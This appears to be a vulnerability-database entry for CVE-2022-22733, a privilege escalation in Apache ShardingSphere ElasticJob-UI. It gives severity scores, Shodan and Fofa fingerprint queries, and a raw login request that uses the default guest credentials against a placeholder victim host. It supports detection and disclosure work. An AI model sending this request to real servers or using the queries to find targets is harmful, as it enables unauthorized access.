| Title | Apache ShardingSphere ElasticJob-UI privilege escalation |
|---|---|
| Author | Zeyad Azima |
| Severity | Medium |
| Impact | Successful exploitation of this vulnerability could result in unauthorized access and control of the ElasticJob-UI application. |
| Remediation | Apply the latest security patches or updates provided by Apache ShardingSphere to mitigate the privilege escalation vulnerability. |
| CVSS Score | 6.5 |
| EPSS Score | 0.86064 |
| CVE ID | CVE-2022-22733 |
| CWE ID | CWE-200 |
| Shodan Query | http.favicon.hash:816588900 |
| Fofa Query | icon_hash=816588900 |
| Tags | cve2022 cve exposure sharingsphere apache vuln |
Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Apache ShardingSphere ElasticJob-UI allows an attacker who has guest account to do privilege escalation. This issue affects Apache ShardingSphere ElasticJob-UI Apache ShardingSphere ElasticJob-UI 3.x version 3.0.0 and prior versions.
POST /api/login HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36
Connection: close
Content-Length: 39
Accept: application/json, text/plain, */*
Access-Token:
Content-Type: application/json;charset=UTF-8
Origin: /
Referer: /
Accept-Encoding: gzip
{"username":"guest","password":"guest"}
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-22733.yaml
🦈 Packet Capture: ⬇️ Download cve-2022-22733.pcap
N/AN/A